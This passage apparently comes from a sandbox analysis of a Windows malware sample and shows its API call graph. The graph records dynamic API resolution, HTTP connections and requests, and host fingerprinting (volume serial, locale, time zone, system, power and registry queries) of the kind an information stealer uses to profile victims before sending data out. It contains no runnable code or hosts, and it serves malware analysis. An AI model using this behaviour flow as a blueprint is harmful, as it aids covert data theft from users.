calls 14378->14379 14380 163eba 14379->14380 14381 1645c0 2 API calls 14380->14381 14382 163ed3 14381->14382 14383 1645c0 2 API calls 14382->14383 14384 163eec 14383->14384 14385 1645c0 2 API calls 14384->14385 14386 163f05 14385->14386 14387 1645c0 2 API calls 14386->14387 14388 163f1e 14387->14388 14389 1645c0 2 API calls 14388->14389 14390 163f37 14389->14390 14391 1645c0 2 API calls 14390->14391 14392 163f50 14391->14392 14393 1645c0 2 API calls 14392->14393 14394 163f69 14393->14394 14395 1645c0 2 API calls 14394->14395 14396 163f82 14395->14396 14397 1645c0 2 API calls 14396->14397 14398 163f9b 14397->14398 14399 1645c0 2 API calls 14398->14399 14400 163fb4 14399->14400 14401 1645c0 2 API calls 14400->14401 14402 163fcd 14401->14402 14403 1645c0 2 API calls 14402->14403 14404 163fe6 14403->14404 14405 1645c0 2 API calls 14404->14405 14406 163fff 14405->14406 14407 1645c0 2 API calls 14406->14407 14408 164018 14407->14408 14409 1645c0 2 API calls 14408->14409 14410 164031 14409->14410 14411 1645c0 2 API calls 14410->14411 14412 16404a 14411->14412 14413 1645c0 2 API calls 14412->14413 14414 164063 14413->14414 14415 1645c0 2 API calls 14414->14415 14416 16407c 14415->14416 14417 1645c0 2 API calls 14416->14417 14418 164095 14417->14418 14419 1645c0 2 API calls 14418->14419 14420 1640ae 14419->14420 14421 1645c0 2 API calls 14420->14421 14422 1640c7 14421->14422 14423 1645c0 2 API calls 14422->14423 14424 1640e0 14423->14424 14425 1645c0 2 API calls 14424->14425 14426 1640f9 14425->14426 14427 1645c0 2 API calls 14426->14427 14428 164112 14427->14428 14429 1645c0 2 API calls 14428->14429 14430 16412b 14429->14430 14431 1645c0 2 API calls 14430->14431 14432 164144 14431->14432 14433 1645c0 2 API calls 14432->14433 14434 16415d 14433->14434 14435 1645c0 2 API calls 14434->14435 14436 164176 14435->14436 14437 1645c0 2 API calls 14436->14437 14438 16418f 14437->14438 14439 1645c0 2 API calls 14438->14439 14440 1641a8 14439->14440 14441 1645c0 2 API calls 14440->14441 14442 1641c1 14441->14442 14443 1645c0 2 API calls 14442->14443 14444 1641da 14443->14444 14445 1645c0 2 API calls 14444->14445 14446 1641f3 14445->14446 14447 1645c0 2 API calls 14446->14447 14448 16420c 14447->14448 14449 1645c0 2 API calls 14448->14449 14450 164225 14449->14450 14451 1645c0 2 API calls 14450->14451 14452 16423e 14451->14452 14453 1645c0 2 API calls 14452->14453 14454 164257 14453->14454 14455 1645c0 2 API calls 14454->14455 14456 164270 14455->14456 14457 1645c0 2 API calls 14456->14457 14458 164289 14457->14458 14459 1645c0 2 API calls 14458->14459 14460 1642a2 14459->14460 14461 1645c0 2 API calls 14460->14461 14462 1642bb 14461->14462 14463 1645c0 2 API calls 14462->14463 14464 1642d4 14463->14464 14465 1645c0 2 API calls 14464->14465 14466 1642ed 14465->14466 14467 1645c0 2 API calls 14466->14467 14468 164306 14467->14468 14469 1645c0 2 API calls 14468->14469 14470 16431f 14469->14470 14471 1645c0 2 API calls 14470->14471 14472 164338 14471->14472 14473 1645c0 2 API calls 14472->14473 14474 164351 14473->14474 14475 1645c0 2 API calls 14474->14475 14476 16436a 14475->14476 14477 1645c0 2 API calls 14476->14477 14478 164383 14477->14478 14479 1645c0 2 API calls 14478->14479 14480 16439c 14479->14480 14481 1645c0 2 API calls 14480->14481 14482 1643b5 14481->14482 14483 1645c0 2 API calls 14482->14483 14484 1643ce 14483->14484 14485 1645c0 2 API calls 14484->14485 14486 1643e7 14485->14486 14487 1645c0 2 API calls 14486->14487 14488 164400 14487->14488 14489 1645c0 2 API calls 14488->14489 14490 164419 14489->14490 14491 1645c0 2 API calls 14490->14491 14492 164432 14491->14492 14493 1645c0 2 API calls 14492->14493 14494 16444b 14493->14494 14495 1645c0 2 API calls 14494->14495 14496 164464 14495->14496 14497 1645c0 2 API calls 14496->14497 14498 16447d 14497->14498 14499 1645c0 2 API calls 14498->14499 14500 164496 14499->14500 14501 1645c0 2 API calls 14500->14501 14502 1644af 14501->14502 14503 1645c0 2 API calls 14502->14503 14504 1644c8 14503->14504 14505 1645c0 2 API calls 14504->14505 14506 1644e1 14505->14506 14507 1645c0 2 API calls 14506->14507 14508 1644fa 14507->14508 14509 1645c0 2 API calls 14508->14509 14510 164513 14509->14510 14511 1645c0 2 API calls 14510->14511 14512 16452c 14511->14512 14513 1645c0 2 API calls 14512->14513 14514 164545 14513->14514 14515 1645c0 2 API calls 14514->14515 14516 16455e 14515->14516 14517 1645c0 2 API calls 14516->14517 14518 164577 14517->14518 14519 1645c0 2 API calls 14518->14519 14520 164590 14519->14520 14521 1645c0 2 API calls 14520->14521 14522 1645a9 14521->14522 14523 179c10 14522->14523 14524 17a036 8 API calls 14523->14524 14525 179c20 43 API calls 14523->14525 14526 17a146 14524->14526 14527 17a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14527 14525->14524 14528 17a216 14526->14528 14529 17a153 8 API calls 14526->14529 14527->14526 14530 17a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 17a298 14528->14531 14529->14528 14530->14531 14532 17a337 14531->14532 14533 17a2a5 6 API calls 14531->14533 14534 17a344 9 API calls 14532->14534 14535 17a41f 14532->14535 14533->14532 14534->14535 14536 17a4a2 14535->14536 14537 17a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 17a4dc 14536->14538 14539 17a4ab GetProcAddress GetProcAddress 14536->14539 14537->14536 14540 17a515 14538->14540 14541 17a4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 17a612 14540->14542 14543 17a522 10 API calls 14540->14543 14541->14540 14544 17a67d 14542->14544 14545 17a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 17a686 GetProcAddress 14544->14546 14547 17a69e 14544->14547 14545->14544 14546->14547 14548 17a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14548 14549 175ca3 14547->14549 14548->14549 14550 161590 14549->14550 15671 161670 14550->15671 14553 17a7a0 lstrcpy 14554 1615b5 14553->14554 14555 17a7a0 lstrcpy 14554->14555 14556 1615c7 14555->14556 14557 17a7a0 lstrcpy 14556->14557 14558 1615d9 14557->14558 14559 17a7a0 lstrcpy 14558->14559 14560 161663 14559->14560 14561 175510 14560->14561 14562 175521 14561->14562 14563 17a820 2 API calls 14562->14563 14564 17552e 14563->14564 14565 17a820 2 API calls 14564->14565 14566 17553b 14565->14566 14567 17a820 2 API calls 14566->14567 14568 175548 14567->14568 14569 17a740 lstrcpy 14568->14569 14570 175555 14569->14570 14571 17a740 lstrcpy 14570->14571 14572 175562 14571->14572 14573 17a740 lstrcpy 14572->14573 14574 17556f 14573->14574 14575 17a740 lstrcpy 14574->14575 14576 17557c 14575->14576 14577 1751f0 20 API calls 14576->14577 14578 175643 StrCmpCA 14576->14578 14579 1756a0 StrCmpCA 14576->14579 14584 17a740 lstrcpy 14576->14584 14585 17a820 lstrlen lstrcpy 14576->14585 14587 175856 StrCmpCA 14576->14587 14590 17a8a0 lstrcpy 14576->14590 14597 175a0b StrCmpCA 14576->14597 14605 161590 lstrcpy 14576->14605 14608 1752c0 25 API calls 14576->14608 14610 17578a StrCmpCA 14576->14610 14614 17593f StrCmpCA 14576->14614 14615 17a7a0 lstrcpy 14576->14615 14577->14576 14578->14576 14579->14576 14580 1757dc 14579->14580 14581 17a8a0 lstrcpy 14580->14581 14582 1757e8 14581->14582 14583 17a820 2 API calls 14582->14583 14586 1757f6 14583->14586 14584->14576 14585->14576 14588 17a820 2 API calls 14586->14588 14587->14576 14589 175991 14587->14589 14592 175805 14588->14592 14591 17a8a0 lstrcpy 14589->14591 14590->14576 14593 17599d 14591->14593 14594 161670 lstrcpy 14592->14594 14595 17a820 2 API calls 14593->14595 14613 175811 14594->14613 14596 1759ab 14595->14596 14598 17a820 2 API calls 14596->14598 14599 175a16 Sleep 14597->14599 14600 175a28 14597->14600 14601 1759ba 14598->14601 14599->14576 14602 17a8a0 lstrcpy 14600->14602 14603 161670 lstrcpy 14601->14603 14604 175a34 14602->14604 14603->14613 14606 17a820 2 API calls 14604->14606 14605->14576 14607 175a43 14606->14607 14609 17a820 2 API calls 14607->14609 14608->14576 14611 175a52 14609->14611 14610->14576 14612 161670 lstrcpy 14611->14612 14612->14613 14613->13668 14614->14576 14615->14576 14617 177553 GetVolumeInformationA 14616->14617 14618 17754c 14616->14618 14619 177591 14617->14619 14618->14617 14620 1775fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 177619 14620->14621 14622 177628 wsprintfA 14620->14622 14623 17a740 lstrcpy 14621->14623 14624 17a740 lstrcpy 14622->14624 14625 175da7 14623->14625 14624->14625 14625->13689 14627 17a7a0 lstrcpy 14626->14627 14628 164899 14627->14628 15680 1647b0 14628->15680 14630 1648a5 14631 17a740 lstrcpy 14630->14631 14632 1648d7 14631->14632 14633 17a740 lstrcpy 14632->14633 14634 1648e4 14633->14634 14635 17a740 lstrcpy 14634->14635 14636 1648f1 14635->14636 14637 17a740 lstrcpy 14636->14637 14638 1648fe 14637->14638 14639 17a740 lstrcpy 14638->14639 14640 16490b InternetOpenA StrCmpCA 14639->14640 14641 164944 14640->14641 14642 164ecb InternetCloseHandle 14641->14642 15686 178b60 14641->15686 14644 164ee8 14642->14644 15701 169ac0 CryptStringToBinaryA 14644->15701 14645 164963 15694 17a920 14645->15694 14649 164976 14650 17a8a0 lstrcpy 14649->14650 14655 16497f 14650->14655 14651 17a820 2 API calls 14652 164f05 14651->14652 14653 17a9b0 4 API calls 14652->14653 14656 164f1b 14653->14656 14654 164f27 codecvt 14658 17a7a0 lstrcpy 14654->14658 14659 17a9b0 4 API calls 14655->14659 14657 17a8a0 lstrcpy 14656->14657 14657->14654 14662 164f57 14658->14662 14660 1649a9 14659->14660 14661 17a8a0 lstrcpy 14660->14661 14663 1649b2 14661->14663 14662->13692 14664 17a9b0 4 API calls 14663->14664 14665 1649d1 14664->14665 14666 17a8a0 lstrcpy 14665->14666 14667 1649da 14666->14667 14668 17a920 3 API calls 14667->14668 14669 1649f8 14668->14669 14670 17a8a0 lstrcpy 14669->14670 14671 164a01 14670->14671 14672 17a9b0 4 API calls 14671->14672 14673 164a20 14672->14673 14674 17a8a0 lstrcpy 14673->14674 14675 164a29 14674->14675 14676 17a9b0 4 API calls 14675->14676 14677 164a48 14676->14677 14678 17a8a0 lstrcpy 14677->14678 14679 164a51 14678->14679 14680 17a9b0 4 API calls 14679->14680 14681 164a7d 14680->14681 14682 17a920 3 API calls 14681->14682 14683 164a84 14682->14683 14684 17a8a0 lstrcpy 14683->14684 14685 164a8d 14684->14685 14686 164aa3 InternetConnectA 14685->14686 14686->14642 14687 164ad3 HttpOpenRequestA 14686->14687 14689 164ebe InternetCloseHandle 14687->14689 14690 164b28 14687->14690 14689->14642 14691 17a9b0 4 API calls 14690->14691 14692 164b3c 14691->14692 14693 17a8a0 lstrcpy 14692->14693 14694 164b45 14693->14694 14695 17a920 3 API calls 14694->14695 14696 164b63 14695->14696 14697 17a8a0 lstrcpy 14696->14697 14698 164b6c 14697->14698 14699 17a9b0 4 API calls 14698->14699 14700 164b8b 14699->14700 14701 17a8a0 lstrcpy 14700->14701 14702 164b94 14701->14702 14703 17a9b0 4 API calls 14702->14703 14704 164bb5 14703->14704 14705 17a8a0 lstrcpy 14704->14705 14706 164bbe 14705->14706 14707 17a9b0 4 API calls 14706->14707 14708 164bde 14707->14708 14709 17a8a0 lstrcpy 14708->14709 14710 164be7 14709->14710 14711 17a9b0 4 API calls 14710->14711 14712 164c06 14711->14712 14713 17a8a0 lstrcpy 14712->14713 14714 164c0f 14713->14714 14715 17a920 3 API calls 14714->14715 14716 164c2d 14715->14716 14717 17a8a0 lstrcpy 14716->14717 14718 164c36 14717->14718 14719 17a9b0 4 API calls 14718->14719 14720 164c55 14719->14720 14721 17a8a0 lstrcpy 14720->14721 14722 164c5e 14721->14722 14723 17a9b0 4 API calls 14722->14723 14724 164c7d 14723->14724 14725 17a8a0 lstrcpy 14724->14725 14726 164c86 14725->14726 14727 17a920 3 API calls 14726->14727 14728 164ca4 14727->14728 14729 17a8a0 lstrcpy 14728->14729 14730 164cad 14729->14730 14731 17a9b0 4 API calls 14730->14731 14732 164ccc 14731->14732 14733 17a8a0 lstrcpy 14732->14733 14734 164cd5 14733->14734 14735 17a9b0 4 API calls 14734->14735 14736 164cf6 14735->14736 14737 17a8a0 lstrcpy 14736->14737 14738 164cff 14737->14738 14739 17a9b0 4 API calls 14738->14739 14740 164d1f 14739->14740 14741 17a8a0 lstrcpy 14740->14741 14742 164d28 14741->14742 14743 17a9b0 4 API calls 14742->14743 14744 164d47 14743->14744 14745 17a8a0 lstrcpy 14744->14745 14746 164d50 14745->14746 14747 17a920 3 API calls 14746->14747 14748 164d6e 14747->14748 14749 17a8a0 lstrcpy 14748->14749 14750 164d77 14749->14750 14751 17a740 lstrcpy 14750->14751 14752 164d92 14751->14752 14753 17a920 3 API calls 14752->14753 14754 164db3 14753->14754 14755 17a920 3 API calls 14754->14755 14756 164dba 14755->14756 14757 17a8a0 lstrcpy 14756->14757 14758 164dc6 14757->14758 14759 164de7 lstrlen 14758->14759 14760 164dfa 14759->14760 14761 164e03 lstrlen 14760->14761 15700 17aad0 14761->15700 14763 164e13 HttpSendRequestA 14764 164e32 InternetReadFile 14763->14764 14765 164e67 InternetCloseHandle 14764->14765 14770 164e5e 14764->14770 14768 17a800 14765->14768 14767 17a9b0 4 API calls 14767->14770 14768->14689 14769 17a8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14767 14770->14769 15707 17aad0 14771->15707 14773 1717c4 StrCmpCA 14774 1717d7 14773->14774 14775 1717cf ExitProcess 14773->14775 14776 1719c2 14774->14776 14777 171913 StrCmpCA 14774->14777 14778 171932 StrCmpCA 14774->14778 14779 1718f1 StrCmpCA 14774->14779 14780 171951 StrCmpCA 14774->14780 14781 171970 StrCmpCA 14774->14781 14782 17187f StrCmpCA 14774->14782 14783 17185d StrCmpCA 14774->14783 14784 1718cf StrCmpCA 14774->14784 14785 1718ad StrCmpCA 14774->14785 14786 17a820 lstrlen lstrcpy 14774->14786 14776->13694 14777->14774 14778->14774 14779->14774 14780->14774 14781->14774 14782->14774 14783->14774 14784->14774 14785->14774 14786->14774 14788 17a7a0 lstrcpy 14787->14788 14789 165979 14788->14789 14790 1647b0 2 API calls 14789->14790 14791 165985 14790->14791 14792 17a740 lstrcpy 14791->14792 14793 1659ba 14792->14793 14794 17a740 lstrcpy 14793->14794 14795 1659c7 14794->14795 14796 17a740 lstrcpy 14795->14796 14797 1659d4 14796->14797 14798 17a740 lstrcpy 14797->14798 14799 1659e1 14798->14799 14800 17a740 lstrcpy 14799->14800 14801 1659ee InternetOpenA StrCmpCA 14800->14801 14802 165a1d 14801->14802 14803 165fc3 InternetCloseHandle 14802->14803 14804 178b60 3 API calls 14802->14804 14805 165fe0 14803->14805 14806 165a3c 14804->14806 14808 169ac0 4 API calls 14805->14808 14807 17a920 3 API calls 14806->14807 14809 165a4f 14807->14809 14810 165fe6 14808->14810 14811 17a8a0 lstrcpy 14809->14811 14812 17a820 2 API calls 14810->14812 14814 16601f codecvt 14810->14814 14816 165a58 14811->14816 14813 165ffd 14812->14813 14815 17a9b0 4 API calls 14813->14815 14818 17a7a0 lstrcpy 14814->14818 14817 166013 14815->14817 14820 17a9b0 4 API calls 14816->14820 14819 17a8a0 lstrcpy 14817->14819 14828 16604f 14818->14828 14819->14814 14821 165a82 14820->14821 14822 17a8a0 lstrcpy 14821->14822 14823 165a8b 14822->14823 14824 17a9b0 4 API calls 14823->14824 14825 165aaa 14824->14825 14826 17a8a0 lstrcpy 14825->14826 14827 165ab3 14826->14827 14829 17a920 3 API calls 14827->14829 14828->13700 14830 165ad1 14829->14830 14831 17a8a0 lstrcpy 14830->14831 14832 165ada 14831->14832 14833 17a9b0 4 API calls 14832->14833 14834 165af9 14833->14834 14835 17a8a0 lstrcpy 14834->14835 14836 165b02 14835->14836 14837 17a9b0 4 API calls 14836->14837 14838 165b21 14837->14838 14839 17a8a0 lstrcpy 14838->14839 14840 165b2a 14839->14840 14841 17a9b0 4 API calls 14840->14841 14842 165b56 14841->14842 14843 17a920 3 API calls 14842->14843 14844 165b5d 14843->14844 14845 17a8a0 lstrcpy 14844->14845 14846 165b66 14845->14846 14847 165b7c InternetConnectA 14846->14847 14847->14803 14848 165bac HttpOpenRequestA 14847->14848 14850 165fb6 InternetCloseHandle 14848->14850 14851 165c0b 14848->14851 14850->14803 14852 17a9b0 4 API calls 14851->14852 14853 165c1f 14852->14853 14854 17a8a0 lstrcpy 14853->14854 14855 165c28 14854->14855 14856 17a920 3 API calls 14855->14856 14857 165c46 14856->14857 14858 17a8a0 lstrcpy 14857->14858 14859 165c4f 14858->14859 14860 17a9b0 4 API calls 14859->14860 14861 165c6e 14860->14861 14862 17a8a0 lstrcpy 14861->14862 14863 165c77 14862->14863 14864 17a9b0 4 API calls 14863->14864 14865 165c98 14864->14865 14866 17a8a0 lstrcpy 14865->14866 14867 165ca1 14866->14867 14868 17a9b0 4 API calls 14867->14868 14869 165cc1 14868->14869 14870 17a8a0 lstrcpy 14869->14870 14871 165cca 14870->14871 14872 17a9b0 4 API calls 14871->14872 14873 165ce9 14872->14873 14874 17a8a0 lstrcpy 14873->14874 14875 165cf2 14874->14875 14876 17a920 3 API calls 14875->14876 14877 165d10 14876->14877 14878 17a8a0 lstrcpy 14877->14878 14879 165d19 14878->14879 14880 17a9b0 4 API calls 14879->14880 14881 165d38 14880->14881 14882 17a8a0 lstrcpy 14881->14882 14883 165d41 14882->14883 14884 17a9b0 4 API calls 14883->14884 14885 165d60 14884->14885 14886 17a8a0 lstrcpy 14885->14886 14887 165d69 14886->14887 14888 17a920 3 API calls 14887->14888 14889 165d87 14888->14889 14890 17a8a0 lstrcpy 14889->14890 14891 165d90 14890->14891 14892 17a9b0 4 API calls 14891->14892 14893 165daf 14892->14893 14894 17a8a0 lstrcpy 14893->14894 14895 165db8 14894->14895 14896 17a9b0 4 API calls 14895->14896 14897 165dd9 14896->14897 14898 17a8a0 lstrcpy 14897->14898 14899 165de2 14898->14899 14900 17a9b0 4 API calls 14899->14900 14901 165e02 14900->14901 14902 17a8a0 lstrcpy 14901->14902 14903 165e0b 14902->14903 14904 17a9b0 4 API calls 14903->14904 14905 165e2a 14904->14905 14906 17a8a0 lstrcpy 14905->14906 14907 165e33 14906->14907 14908 17a920 3 API calls 14907->14908 14909 165e54 14908->14909 14910 17a8a0 lstrcpy 14909->14910 14911 165e5d 14910->14911 14912 165e70 lstrlen 14911->14912 15708 17aad0 14912->15708 14914 165e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 17aad0 14914->15709 14916 165eae lstrlen 14917 165ebe 14916->14917 14918 165ed7 lstrlen 14917->14918 14919 165ee7 14918->14919 14920 165ef0 lstrlen 14919->14920 14921 165f04 14920->14921 14922 165f1a lstrlen 14921->14922 15710 17aad0 14922->15710 14924 165f2a HttpSendRequestA 14925 165f35 InternetReadFile 14924->14925 14926 165f6a InternetCloseHandle 14925->14926 14930 165f61 14925->14930 14926->14850 14928 17a9b0 4 API calls 14928->14930 14929 17a8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14932 171077 14931->14932 14933 171151 14932->14933 14934 17a820 lstrlen lstrcpy 14932->14934 14933->13702 14934->14932 14936 170db7 14935->14936 14937 170f17 14936->14937 14938 170e27 StrCmpCA 14936->14938 14939 170e67 StrCmpCA 14936->14939 14940 170ea4 StrCmpCA 14936->14940 14941 17a820 lstrlen lstrcpy 14936->14941 14937->13710 14938->14936 14939->14936 14940->14936 14941->14936 14943 170f67 14942->14943 14944 171044 14943->14944 14945 170fb2 StrCmpCA 14943->14945 14946 17a820 lstrlen lstrcpy 14943->14946 14944->13718 14945->14943 14946->14943 14948 17a740 lstrcpy 14947->14948 14949 171a26 14948->14949 14950 17a9b0 4 API calls 14949->14950 14951 171a37 14950->14951 14952 17a8a0 lstrcpy 14951->14952 14953 171a40 14952->14953 14954 17a9b0 4 API calls 14953->14954 14955 171a5b 14954->14955 14956 17a8a0 lstrcpy 14955->14956 14957 171a64 14956->14957 14958 17a9b0 4 API calls 14957->14958 14959 171a7d 14958->14959 14960 17a8a0 lstrcpy 14959->14960 14961 171a86 14960->14961 14962 17a9b0 4 API calls 14961->14962 14963 171aa1 14962->14963 14964 17a8a0 lstrcpy 14963->14964 14965 171aaa 14964->14965 14966 17a9b0 4 API calls 14965->14966 14967 171ac3 14966->14967 14968 17a8a0 lstrcpy 14967->14968 14969 171acc 14968->14969 14970 17a9b0 4 API calls 14969->14970 14971 171ae7 14970->14971 14972 17a8a0 lstrcpy 14971->14972 14973 171af0 14972->14973 14974 17a9b0 4 API calls 14973->14974 14975 171b09 14974->14975 14976 17a8a0 lstrcpy 14975->14976 14977 171b12 14976->14977 14978 17a9b0 4 API calls 14977->14978 14979 171b2d 14978->14979 14980 17a8a0 lstrcpy 14979->14980 14981 171b36 14980->14981 14982 17a9b0 4 API calls 14981->14982 14983 171b4f 14982->14983 14984 17a8a0 lstrcpy 14983->14984 14985 171b58 14984->14985 14986 17a9b0 4 API calls 14985->14986 14987 171b76 14986->14987 14988 17a8a0 lstrcpy 14987->14988 14989 171b7f 14988->14989 14990 177500 6 API calls 14989->14990 14991 171b96 14990->14991 14992 17a920 3 API calls 14991->14992 14993 171ba9 14992->14993 14994 17a8a0 lstrcpy 14993->14994 14995 171bb2 14994->14995 14996 17a9b0 4 API calls 14995->14996 14997 171bdc 14996->14997 14998 17a8a0 lstrcpy 14997->14998 14999 171be5 14998->14999 15000 17a9b0 4 API calls 14999->15000 15001 171c05 15000->15001 15002 17a8a0 lstrcpy 15001->15002 15003 171c0e 15002->15003 15711 177690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 17a9b0 4 API calls 15007 171c2e 15006->15007 15008 17a8a0 lstrcpy 15007->15008 15009 171c37 15008->15009 15010 17a9b0 4 API calls 15009->15010 15011 171c56 15010->15011 15012 17a8a0 lstrcpy 15011->15012 15013 171c5f 15012->15013 15014 17a9b0 4 API calls 15013->15014 15015 171c80 15014->15015 15016 17a8a0 lstrcpy 15015->15016 15017 171c89 15016->15017 15718 1777c0 GetCurrentProcess IsWow64Process 15017->15718 15020 17a9b0 4 API calls 15021 171ca9 15020->15021 15022 17a8a0 lstrcpy 15021->15022 15023 171cb2 15022->15023 15024 17a9b0 4 API calls 15023->15024 15025 171cd1 15024->15025 15026 17a8a0 lstrcpy 15025->15026 15027 171cda 15026->15027 15028 17a9b0 4 API calls 15027->15028 15029 171cfb 15028->15029 15030 17a8a0 lstrcpy 15029->15030 15031 171d04 15030->15031 15032 177850 3 API calls 15031->15032 15033 171d14 15032->15033 15034 17a9b0 4 API calls 15033->15034 15035 171d24 15034->15035 15036 17a8a0 lstrcpy 15035->15036 15037 171d2d 15036->15037 15038 17a9b0 4 API calls 15037->15038 15039 171d4c 15038->15039 15040 17a8a0 lstrcpy 15039->15040 15041 171d55 15040->15041 15042 17a9b0 4 API calls 15041->15042 15043 171d75 15042->15043 15044 17a8a0 lstrcpy 15043->15044 15045 171d7e 15044->15045 15046 1778e0 3 API calls 15045->15046 15047 171d8e 15046->15047 15048 17a9b0 4 API calls 15047->15048 15049 171d9e 15048->15049 15050 17a8a0 lstrcpy 15049->15050 15051 171da7 15050->15051 15052 17a9b0 4 API calls 15051->15052 15053 171dc6 15052->15053 15054 17a8a0 lstrcpy 15053->15054 15055 171dcf 15054->15055 15056 17a9b0 4 API calls 15055->15056 15057 171df0 15056->15057 15058 17a8a0 lstrcpy 15057->15058 15059 171df9 15058->15059 15720 177980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 17a9b0 4 API calls 15063 171e19 15062->15063 15064 17a8a0 lstrcpy 15063->15064 15065 171e22 15064->15065 15066 17a9b0 4 API calls 15065->15066 15067 171e41 15066->15067 15068 17a8a0 lstrcpy 15067->15068 15069 171e4a 15068->15069 15070 17a9b0 4 API calls 15069->15070 15071 171e6b 15070->15071 15072 17a8a0 lstrcpy 15071->15072 15073 171e74 15072->15073 15722 177a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 17a9b0 4 API calls 15077 171e94 15076->15077 15078 17a8a0 lstrcpy 15077->15078 15079 171e9d 15078->15079 15080 17a9b0 4 API calls 15079->15080 15081 171ebc 15080->15081 15082 17a8a0 lstrcpy 15081->15082 15083 171ec5 15082->15083 15084 17a9b0 4 API calls 15083->15084 15085 171ee5 15084->15085 15086 17a8a0 lstrcpy 15085->15086 15087 171eee 15086->15087 15725 177b00 GetUserDefaultLocaleName 15087->15725 15090 17a9b0 4 API calls 15091 171f0e 15090->15091 15092 17a8a0 lstrcpy 15091->15092 15093 171f17 15092->15093 15094 17a9b0 4 API calls 15093->15094 15095 171f36 15094->15095 15096 17a8a0 lstrcpy 15095->15096 15097 171f3f 15096->15097 15098 17a9b0 4 API calls 15097->15098 15099 171f60 15098->15099 15100 17a8a0 lstrcpy 15099->15100 15101 171f69 15100->15101 15729 177b90 15101->15729 15103 171f80 15104 17a920 3 API calls 15103->15104 15105 171f93 15104->15105 15106 17a8a0 lstrcpy 15105->15106 15107 171f9c 15106->15107 15108 17a9b0 4 API calls 15107->15108 15109 171fc6 15108->15109 15110 17a8a0 lstrcpy 15109->15110 15111 171fcf 15110->15111 15112 17a9b0 4 API calls 15111->15112 15113 171fef 15112->15113 15114 17a8a0 lstrcpy 15113->15114 15115 171ff8 15114->15115 15741 177d80 GetSystemPowerStatus 15115->15741 15118 17a9b0 4 API calls 15119 172018 15118->15119 15120 17a8a0 lstrcpy 15119->15120 15121 172021 15120->15121 15122 17a9b0 4 API calls 15121->15122 15123 172040 15122->15123 15124 17a8a0 lstrcpy 15123->15124 15125 172049 15124->15125 15126 17a9b0 4 API calls 15125->15126 15127 17206a 15126->15127 15128 17a8a0 lstrcpy 15127->15128 15129 172073 15128->15129 15130 17207e GetCurrentProcessId 15129->15130 15743 179470 OpenProcess 15130->15743 15133 17a920 3 API calls 15134 1720a4 15133->15134 15135 17a8a0 lstrcpy 15134->15135 15136 1720ad 15135->15136 15137 17a9b0 4 API calls 15136->15137 15138 1720d7 15137->15138 15139 17a8a0 lstrcpy 15138->15139 15140 1720e0 15139->15140 15141 17a9b0 4 API calls 15140->15141 15142 172100 15141->15142 15143 17a8a0 lstrcpy 15142->15143 15144 172109 15143->15144 15748 177e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 17a9b0 4 API calls 15148 172129 15147->15148 15149 17a8a0 lstrcpy 15148->15149 15150 172132 15149->15150 15151 17a9b0 4 API calls 15150->15151 15152 172151 15151->15152 15153 17a8a0 lstrcpy 15152->15153 15154 17215a 15153->15154 15155 17a9b0 4 API calls 15154->15155 15156 17217b 15155->15156 15157 17a8a0 lstrcpy 15156->15157 15158 172184 15157->15158 15752 177f60 15158->15752 15161 17a9b0 4 API calls 15162 1721a4 15161->15162 15163 17a8a0 lstrcpy 15162->15163 15164 1721ad 15163->15164 15165 17a9b0 4 API calls 15164->15165 15166 1721cc 15165->15166 15167 17a8a0 lstrcpy 15166->15167 15168 1721d5 15167->15168 15169 17a9b0 4 API calls 15168->15169 15170 1721f6 15169->15170 15171 17a8a0 lstrcpy 15170->15171 15172 1721ff 15171->15172 15765 177ed0 GetSystemInfo wsprintfA 15172->15765 15175 17a9b0 4 API calls 15176 17221f 15175->15176 15177 17a8a0 lstrcpy 15176->15177 15178 172228 15177->15178 15179 17a9b0 4 API calls 15178->15179 15180 172247 15179->15180 15181 17a8a0 lstrcpy 15180->15181 15182 172250 15181->15182 15183 17a9b0 4 API calls 15182->15183 15184 172270 15183->15184 15185 17a8a0 lstrcpy 15184->15185 15186 172279 15185->15186 15767 178100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 17a9b0 4 API calls 15190 172299 15189->15190 15191 17a8a0 lstrcpy 15190->15191 15192 1722a2 15191->15192 15193 17a9b0 4 API calls 15192->15193 15194 1722c1 15193->15194 15195 17a8a0 lstrcpy 15194->15195 15196 1722ca 15195->15196 15197 17a9b0 4 API calls 15196->15197 15198 1722eb 15197->15198 15199 17a8a0 lstrcpy 15198->15199 15200 1722f4 15199->15200 15773 1787c0 15200->15773 15203 17a920 3 API calls 15204 17231e 15203->15204 15205 17a8a0 lstrcpy 15204->15205 15206 172327 15205->15206 15207 17a9b0 4 API calls 15206->15207 15208 172351 15207->15208 15209 17a8a0 lstrcpy 15208->15209 15210 17235a 15209->15210 15211 17a9b0 4 API calls 15210->15211 15212 17237a 15211->15212 15213 17a8a0 lstrcpy 15212->15213 15214 172383 15213->15214 15215 17a9b0 4 API calls 15214->15215 15216 1723a2 15215->15216 15217 17a8a0 lstrcpy 15216->15217 15218 1723ab 15217->15218 15778 1781f0 15218->15778 15220 1723c2 15221 17a920 3 API calls 15220->15221 15222 1723d5 15221->15222 15223 17a8a0 lstrcpy 15222->15223 15224 1723de 15223->15224 15225 17a9b0 4 API calls 15224->15225 15226 17240a 15225->15226 15227 17a8a0 lstrcpy 15226->15227 15228 172413 15227->15228 15229 17a9b0 4 API calls 15228->15229 15230 172432 15229->15230 15231 17a8a0 lstrcpy 15230->15231 15232 17243b 15231->15232 15233 17a9b0 4 API calls 15232->15233 15234 17245c 15233->15234 15235 17a8a0 lstrcpy 15234->15235 15236 172465 15235->15236 15237 17a9b0 4 API calls 15236->15237 15238 172484 15237->15238 15239 17a8a0 lstrcpy 15238->15239 15240 17248d 15239->15240 15241 17a9b0 4 